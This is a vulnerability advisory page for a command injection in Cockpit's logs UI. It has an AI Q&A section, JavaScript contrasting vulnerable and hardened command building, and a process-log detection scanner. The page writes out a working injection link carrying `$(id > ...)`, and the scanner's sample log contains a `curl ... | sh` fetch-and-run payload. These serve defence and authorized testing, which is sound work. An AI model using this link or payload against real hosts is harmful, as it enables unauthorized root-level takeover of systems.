CVE-2026-4802
Arbitrary Command Execution in Cockpit
Publication date: 2026-05-11
Last updated on: 2026-05-11
Assigner: Red Hat, Inc.
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: | |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| cockpit_project | cockpit | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-4802 is an OS command injection (CWE-78) in the system logs user interface (UI) of the Cockpit project. An attacker who can get a logged-in Cockpit user to open a crafted link can execute arbitrary shell commands on the host, with the privileges of that user's Cockpit session (which are root privileges when the session has administrative access enabled).
The flaw exists because user-controlled parameters carried in the link (the filter values after `#` in the logs page URL) are passed unsanitized into a shell command string built by the logs UI code. Specifically, in the `loadServiceFilters()` function of `logsJournal.jsx`, these parameters are joined into a single command string that is executed via `/bin/bash -ec`, so the values are parsed by a shell instead of being passed as separate argument-vector entries.
An attacker can therefore place shell metacharacters and command substitutions (such as `$(...)` or backticks) in these parameters, and the shell executes them as commands on the affected system.
A proof-of-concept demonstrated this by injecting the `id` command and writing its output to a file on the host, confirming that the injection yields code execution.
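The following JavaScript is an added illustration written for this page, not code from the Cockpit project or from `logsJournal.jsx`: it contrasts the CWE-78 pattern described above (filter values joined into one string for `/bin/bash -ec`) with two hardened forms, passing each value as its own argument-vector entry and allow-list validating the values before use. The function names, the `since`/`priority` filter fields and the sample parameter objects are assumptions made for the example.

```javascript
"use strict";

// Added illustration of the CWE-78 pattern described for CVE-2026-4802. This is
// NOT Cockpit's logsJournal.jsx; function names and the since/priority filter
// fields are assumptions for the example.

// Filter values as they would arrive from the URL fragment (constructed samples).
const benignParams = { since: "-1h", priority: "3" };
const maliciousParams = { since: "$(id > /tmp/cockpit-rce-proof)", priority: "3" };

// Vulnerable pattern: values are interpolated into one string that a shell
// parses, so `$(...)`, backticks, `;`, `|` and redirections are all honoured.
function buildJournalShellCommand(params) {
  const parts = ["journalctl", "-q", "-o", "json"];
  if (params.since) parts.push("--since", params.since);
  if (params.priority) parts.push("-p", params.priority);
  return parts.join(" "); // this string would be handed to `/bin/bash -ec`
}

// Hardened form 1: keep every value a separate argv element and spawn the
// program directly, with no shell in between. The payload stays a literal
// argument that journalctl will simply reject as an invalid timestamp.
function buildJournalArgv(params) {
  const argv = ["journalctl", "-q", "-o", "json"];
  if (params.since) argv.push("--since", params.since);
  if (params.priority) argv.push("-p", params.priority);
  return argv;
}

// Hardened form 2: allow-list what a filter value may look like before it is
// used at all. These patterns are deliberately narrower than systemd's full
// time syntax: an offset like -1h or +30min, the words now/today/yesterday/
// tomorrow, or an ISO-style date with optional time.
const SINCE_RE = /^(?:[+-]?\d+(?:s|m|min|h|d|w|month|y)?|now|today|yesterday|tomorrow|\d{4}-\d{2}-\d{2}(?: \d{2}:\d{2}(?::\d{2})?)?)$/;
const PRIO = "(?:[0-7]|emerg|alert|crit|err|warning|notice|info|debug)";
const PRIORITY_RE = new RegExp("^" + PRIO + "(?:\\.\\." + PRIO + ")?$");

// Returns the names of the fields that fail validation (empty array = OK).
function validateParams(params) {
  const errors = [];
  if (params.since !== undefined && !SINCE_RE.test(params.since)) errors.push("since");
  if (params.priority !== undefined && !PRIORITY_RE.test(params.priority)) errors.push("priority");
  return errors;
}

// POSIX single-quote escaping, for the case where a shell string genuinely
// cannot be avoided: wrap in '...' and turn each embedded ' into '\''.
function shellQuote(value) {
  return "'" + String(value).replace(/'/g, "'\\''") + "'";
}

// Validation plus quoting: a rejected value never reaches the shell, and an
// accepted one cannot break out of its quotes.
function buildJournalShellCommandSafely(params) {
  const errors = validateParams(params);
  if (errors.length > 0) throw new Error("invalid filter value(s): " + errors.join(", "));
  const parts = ["journalctl", "-q", "-o", "json"];
  if (params.since) parts.push("--since", shellQuote(params.since));
  if (params.priority) parts.push("-p", shellQuote(params.priority));
  return parts.join(" ");
}

console.log("vulnerable :", buildJournalShellCommand(maliciousParams));
console.log("argv       :", JSON.stringify(buildJournalArgv(maliciousParams)));
console.log("validation :", validateParams(maliciousParams));
console.log("safe string:", buildJournalShellCommandSafely(benignParams));
```

Run it with `node` to see the payload survive intact inside the vulnerable string, sit harmlessly as one argv element in the hardened form, and be rejected outright by the allow-list. The argv form is the real fix; the quoting helper only matters if the shell cannot be removed, and even then it should sit behind validation rather than replace it.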
How can this vulnerability impact me?
Successful exploitation gives the attacker arbitrary shell command execution on the host, with the privileges of the Cockpit session that opened the link; if that session has administrative access, the commands run as root and the result is a complete system compromise.
From there an attacker can read or exfiltrate data, disrupt services, install malware or persistence, or pivot further into the network.
The trigger is a crafted link handled by the Cockpit system logs UI, so any Cockpit instance whose users can be lured into opening such a link is exposed. The attacker does not need to break authentication, only to reach an already authenticated user (or to hold Cockpit credentials of their own).
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Because the malicious values travel in the URL fragment (the part after `#`), which browsers never send to the server, web server or proxy logs in front of Cockpit will not show them; look on the host instead. Start by checking the installed Cockpit version against the fix information from the assigner (the affected range recorded here is `*`, so every version counts as vulnerable until a fixed one is published), for example with `rpm -q cockpit` or `dpkg -l cockpit` on the host.
To confirm the flaw directly on a system you are authorized to test, open a crafted link while logged into Cockpit and check whether the injected command ran. The proof-of-concept injects `id` and writes its output to a file, so the check is whether that file appears; the file's owner tells you which account the injected command ran as.
Since the vulnerability arises from the `loadServiceFilters()` function executing commands via `/bin/bash -ec` with unsanitized input, a URL similar to `http://<cockpit-host>/#/system/logs#/?since=$(id > /tmp/cockpit-rce-proof)` (adjust scheme and port; Cockpit listens on TCP 9090 over HTTPS by default) followed by `ls -l /tmp/cockpit-rce-proof` and `cat /tmp/cockpit-rce-proof` on the host is enough to test. For ongoing detection, audit process execution (for example an auditd `execve` rule) and look for `/bin/bash -ec` children of `cockpit-bridge` whose script argument contains command substitutions or other shell metacharacters.
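As an added detection example (not from this page or from the Cockpit project), the following JavaScript scans a constructed, simplified JSON-lines process-execution log for shells spawned by `cockpit-bridge` whose inline `-c` script contains command substitutions or other injection constructs. The log format, the `ppid_comm`/`argv`/`uid` field names and the sample events are assumptions; real auditd `EXECVE` records or eBPF exec traces are shaped differently, so adapt `parseExecLog()` to your collector and keep the rule.

```javascript
"use strict";

// Added detection example, not from the page or the Cockpit project. The input
// is a constructed, simplified JSON-lines exec log (one process execution per
// line with ts, ppid_comm, uid and argv); auditd EXECVE records or eBPF exec
// traces are shaped differently, so adapt parseExecLog() and keep the rule.
const SAMPLE_EXEC_LOG = [
  // an ordinary logs-page query
  '{"ts":"2026-05-11T10:00:01Z","ppid_comm":"cockpit-bridge","uid":1000,"argv":["/bin/bash","-ec","journalctl -q -o json --since -1h -p 3"]}',
  // command substitution injected through a crafted link
  '{"ts":"2026-05-11T10:02:17Z","ppid_comm":"cockpit-bridge","uid":1000,"argv":["/bin/bash","-ec","journalctl -q -o json --since $(id > /tmp/cockpit-rce-proof)"]}',
  // backtick variant from a session with administrative access (uid 0)
  '{"ts":"2026-05-11T10:03:40Z","ppid_comm":"cockpit-bridge","uid":0,"argv":["/bin/bash","-ec","journalctl -q --since `curl http://198.51.100.7/x|sh`"]}',
  // a shell with a substitution, but spawned by sshd, not by the bridge
  '{"ts":"2026-05-11T10:05:00Z","ppid_comm":"sshd","uid":1000,"argv":["/bin/bash","-c","echo $(date)"]}',
  // a malformed line, which the scanner must skip rather than crash on
  "not json at all",
].join("\n");

// Constructs that a journal filter value has no legitimate reason to contain.
// Deliberately excludes a lone `|` and `>` because the bridge's own command
// line on a given build may use pipes or redirections; add them once you have
// baselined what the legitimate command looks like on your hosts.
const INJECTION_RE = /\$\(|`|\$\{|;|&&|\|\||\n/;

function parseExecLog(text) {
  const events = [];
  for (const line of text.split("\n")) {
    if (line.trim() === "") continue;
    try {
      const ev = JSON.parse(line);
      if (Array.isArray(ev.argv) && ev.argv.length > 0) events.push(ev);
    } catch (err) {
      // malformed line: skip it; a real pipeline would count these
    }
  }
  return events;
}

// True for `bash -c`, `sh -ec`, etc.: a shell handed an inline script.
function isShellWithInlineScript(argv) {
  const base = String(argv[0]).split("/").pop();
  const flag = argv.length > 1 ? argv[1] : "";
  return ["bash", "sh", "dash"].includes(base) && /^-[a-z]*c[a-z]*$/.test(flag) && argv.length >= 3;
}

// Returns one hit per shell spawned by cockpit-bridge whose inline script
// contains an injection construct, noting the first construct matched.
function findSuspiciousBridgeShells(text) {
  const hits = [];
  for (const ev of parseExecLog(text)) {
    if (ev.ppid_comm !== "cockpit-bridge") continue;
    if (!isShellWithInlineScript(ev.argv)) continue;
    const script = ev.argv[2];
    const m = INJECTION_RE.exec(script);
    if (m) hits.push({ ts: ev.ts, uid: ev.uid, construct: m[0], script });
  }
  return hits;
}

for (const hit of findSuspiciousBridgeShells(SAMPLE_EXEC_LOG)) {
  console.log(`${hit.ts} uid=${hit.uid} construct=${JSON.stringify(hit.construct)} script=${hit.script}`);
}
```

The parent-process filter is what keeps this precise: interactive shells run command substitutions all day, but a `bash -ec` child of `cockpit-bridge` carrying `$(` or a backtick in its script is exactly the shape the proof-of-concept produces. The `uid` in a hit tells you whether the injected command ran as an unprivileged user or as root.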
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation is to limit who can reach Cockpit at all: restrict network access to the Cockpit web service (TCP 9090 by default) to trusted networks and restrict logins to the accounts that need it, since the exploit runs inside an authenticated session.
Until a patch is released, do not open untrusted or suspicious links into the Cockpit system logs page; a link carrying crafted filter parameters is the exploit vector, and the injected command runs with your session's privileges once the page processes those parameters.
Monitor for signs of exploitation: unexpected files such as `/tmp/cockpit-rce-proof`, and shell processes spawned by `cockpit-bridge` whose inline script contains command substitutions or other shell metacharacters.
Apply the vendor's fix as soon as it becomes available and verify the installed version afterwards; the affected range recorded above is `*`, so treat every current version as vulnerable until the assigner publishes a fixed version.